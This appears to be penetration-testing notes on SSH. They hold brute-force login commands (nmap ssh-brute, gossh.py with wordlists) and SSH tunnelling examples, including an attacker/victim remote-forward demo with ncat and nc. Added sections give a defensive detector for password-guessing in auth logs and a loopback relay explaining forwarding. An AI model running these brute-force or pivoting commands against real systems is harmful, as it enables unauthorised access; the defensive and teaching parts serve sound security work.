SSH
Test SSH authentication
Using nmap
nmap -p 22 --script ssh-brute --script-args userdb=users.txt,passwd=passwords.txt <TARGET>
Using a Python script
TODO: choose between creating a GitHub repo or a single gist…
git clone https://github.com/kalidor/gossh.py
gist get gossh.py
./gossh.py -U users.lst -P passwds.lst targets.lst -p 22
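The defender-side view of the credential test above, as an added example that is not part of these notes or of gossh.py: a small detector that reads sshd's auth log, flags a source IP that produces a burst of failed logins inside a sliding window, and records whether that same source later logged in successfully (the case worth paging on). The log lines, hostname, IPs and PIDs are constructed for the example; the year is supplied by the caller because syslog timestamps do not carry one.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Constructed sample in the syslog format OpenSSH's sshd writes; host, IPs and
# PIDs are made up for this example and are not taken from any real system.
SAMPLE_AUTH_LOG = """\
Mar  3 10:15:01 bastion sshd[2201]: Failed password for invalid user admin from 198.51.100.7 port 50122 ssh2
Mar  3 10:15:02 bastion sshd[2203]: Failed password for invalid user test from 198.51.100.7 port 50123 ssh2
Mar  3 10:15:02 bastion sshd[2205]: Failed password for root from 198.51.100.7 port 50124 ssh2
Mar  3 10:15:03 bastion sshd[2207]: Failed password for invalid user oracle from 198.51.100.7 port 50125 ssh2
Mar  3 10:15:04 bastion sshd[2209]: Failed password for invalid user guest from 198.51.100.7 port 50126 ssh2
Mar  3 10:15:05 bastion sshd[2211]: Accepted password for root from 198.51.100.7 port 50127 ssh2
Mar  3 10:20:11 bastion sshd[2300]: Failed password for alice from 203.0.113.9 port 41000 ssh2
Mar  3 10:20:40 bastion sshd[2302]: Accepted publickey for alice from 203.0.113.9 port 41001 ssh2
Mar  3 10:21:00 bastion sshd[2310]: Connection closed by 203.0.113.9 port 41002 [preauth]
"""

# Matches the "Failed/Accepted <method> for [invalid user] <user> from <ip> port <n>" verdict lines.
LINE_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2}\s+\d{1,2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) (?P<method>password|publickey) for "
    r"(?:invalid user )?(?P<user>\S+) from (?P<src>\S+) port \d+"
)


def parse_line(line, year=2024):
    """Return a dict for an auth verdict line, or None for any other sshd line."""
    m = LINE_RE.match(line)
    if not m:
        return None  # e.g. "Connection closed by ... [preauth]"
    ev = m.groupdict()
    # syslog timestamps carry no year; the caller supplies it (assumption for this example)
    ev["ts"] = datetime.strptime(f"{year} {ev['ts']}", "%Y %b %d %H:%M:%S")
    return ev


def detect_password_guessing(log_text, threshold=5, window_s=60, year=2024):
    """Flag each source IP with >= threshold failures inside a sliding window of
    window_s seconds. For a flagged source, also record the first later successful
    login as (user, method): a success after a burst means the guessing may have worked."""
    recent = defaultdict(deque)   # src -> timestamps of failures still inside the window
    tried = defaultdict(set)      # src -> user names that failed so far
    findings = {}
    for line in log_text.splitlines():
        ev = parse_line(line, year)
        if ev is None:
            continue
        src, ts = ev["src"], ev["ts"]
        if ev["result"] == "Failed":
            tried[src].add(ev["user"])
            q = recent[src]
            q.append(ts)
            while q and (ts - q[0]).total_seconds() > window_s:
                q.popleft()               # expire failures that fell out of the window
            if len(q) >= threshold:
                f = findings.setdefault(src, {"failures": 0, "users": set(),
                                              "success_after_burst": None})
                f["failures"] = max(f["failures"], len(q))
                f["users"] |= tried[src]
        elif src in findings and findings[src]["success_after_burst"] is None:
            findings[src]["success_after_burst"] = (ev["user"], ev["method"])
    return findings


if __name__ == "__main__":
    for src, f in detect_password_guessing(SAMPLE_AUTH_LOG).items():
        print(src, f)
```

With the defaults, the run flags 198.51.100.7 (five distinct user names in four seconds, then an accepted password for root) and leaves 203.0.113.9 alone, since a single failure followed by a key login is ordinary user behaviour. Threshold and window are the knobs to tune against your own baseline; a slow scan that stays under the window needs a longer window or a distinct-users criterion instead.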
Tunnels
Dynamic forward
[prompt]%
[prompt]% ~?
Supported escape sequences:
~. - terminate connection (and any multiplexed sessions)
~B - send a BREAK to the remote system
~C - open a command line
~R - request rekey
~V/v - decrease/increase verbosity (LogLevel)
~^Z - suspend ssh
~# - list forwarded connections
~& - background ssh (when waiting for connections to terminate)
~? - this message
~~ - send the escape character by typing it twice
[prompt]%
[prompt]% ~C
ssh> ?
Commands:
-L[bind_address:]port:host:hostport Request local forward
-R[bind_address:]port:host:hostport Request remote forward
-D[bind_address:]port Request dynamic forward
-KL[bind_address:]port Cancel local forward
-KR[bind_address:]port Cancel remote forward
-KD[bind_address:]port Cancel dynamic forward
Local forward
ssh -L XXXX:WEBSITE.FR:443 SSH_SERVER -i id_rsa -l USER
- XXXX: local port on which the remote port 443 will be reachable
- WEBSITE.FR: website I want to access
- 443: port the website is listening on
- USER: SSH user
We can now do the following to reach WEBSITE.FR:443 through the SSH tunnel:
curl https://localhost:XXXX
Or I can add to /etc/hosts:
W.X.Y.Z WEBSITE.FR
And I can now do:
curl https://WEBSITE.FR:XXXX
Cancel local forward:
~C
-KL [LISTENING PORT]
Remote Forwarding
ssh -R XXXX:127.0.0.1:1111 SSH_SERVER -i id_rsa -l USER
- Attacker box:
ncat -nlvp 1111
- Victim box:
echo plop | nc 127.0.0.1 XXXX
- Attacker box receives 'plop'
Cancel Remote port:
~C
-KR [LISTENING PORT]
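What the listener side of both forwards above actually does, as an added example that is not from these notes: a minimal TCP relay with the same shape as the entrance of `ssh -L` (listener on the client) and `ssh -R` (listener on the server), namely listen on bind_address:port, connect to host:hostport per accepted connection, and pump bytes both ways with half-close. The SSH transport itself is left out; the echo service standing in for WEBSITE.FR:443 or the ncat listener, and all addresses and ports, are constructed for a loopback test.

```python
import socket
import threading

# Added example, not part of the original notes. Everything runs on 127.0.0.1 with
# OS-assigned ports so it is safe to execute anywhere; the SSH layer is omitted.


def _pump(src: socket.socket, dst: socket.socket) -> None:
    """Copy bytes src -> dst until src reaches EOF, then half-close dst so the
    peer also sees EOF (the same thing a forwarded channel does on close)."""
    try:
        while True:
            chunk = src.recv(4096)
            if not chunk:
                break
            dst.sendall(chunk)
    except OSError:
        pass
    finally:
        try:
            dst.shutdown(socket.SHUT_WR)
        except OSError:
            pass


class PortForwarder:
    """Listen on bind_addr:port and relay every accepted connection to host:hostport.

    For `ssh -L [bind_address:]port:host:hostport` this listener lives on the SSH
    client; for `ssh -R` it lives on the SSH server. Whoever can reach bind_addr can
    use the tunnel, so 127.0.0.1 (ssh's default) keeps the entrance private to the
    machine it runs on, while 0.0.0.0 opens it to the whole network.
    """

    def __init__(self, bind_addr: str, port: int, host: str, hostport: int):
        self.listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.listener.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        self.listener.bind((bind_addr, port))  # port 0 lets the OS pick (test convenience)
        self.listener.listen(8)
        self.port = self.listener.getsockname()[1]
        self.target = (host, hostport)
        self.connections = 0
        threading.Thread(target=self._accept_loop, daemon=True).start()

    def _accept_loop(self) -> None:
        while True:
            try:
                client, _ = self.listener.accept()
            except OSError:       # listener closed
                return
            try:
                upstream = socket.create_connection(self.target, timeout=5)
            except OSError:       # far end unreachable: drop this client, keep serving
                client.close()
                continue
            self.connections += 1
            threading.Thread(target=_pump, args=(client, upstream), daemon=True).start()
            threading.Thread(target=_pump, args=(upstream, client), daemon=True).start()

    def close(self) -> None:
        self.listener.close()


def start_echo_service() -> socket.socket:
    """Constructed stand-in for the far end of the tunnel: echoes what it receives."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(8)

    def serve() -> None:
        while True:
            try:
                conn, _ = srv.accept()
            except OSError:
                return
            with conn:
                conn.sendall(conn.recv(4096))

    threading.Thread(target=serve, daemon=True).start()
    return srv


def send_through_tunnel(payload: bytes = b"plop\n") -> bytes:
    """Bring up the echo service and a forwarder in front of it, push payload through
    the tunnel entrance (the `echo plop | nc 127.0.0.1 XXXX` step) and return the reply."""
    echo = start_echo_service()
    host, hostport = echo.getsockname()
    fwd = PortForwarder("127.0.0.1", 0, host, hostport)
    try:
        with socket.create_connection(("127.0.0.1", fwd.port), timeout=5) as c:
            c.sendall(payload)
            c.shutdown(socket.SHUT_WR)          # we are done sending; wait for the echo
            reply = b""
            while chunk := c.recv(4096):
                reply += chunk
        return reply
    finally:
        fwd.close()
        echo.close()


if __name__ == "__main__":
    print(send_through_tunnel())
```

The bind address is the security decision in both directions: with `-L` an entrance bound to 0.0.0.0 lets any host on your network reach WEBSITE.FR through your SSH session, and with `-R` the server only binds the listener to a non-loopback address if its sshd_config allows it via GatewayPorts.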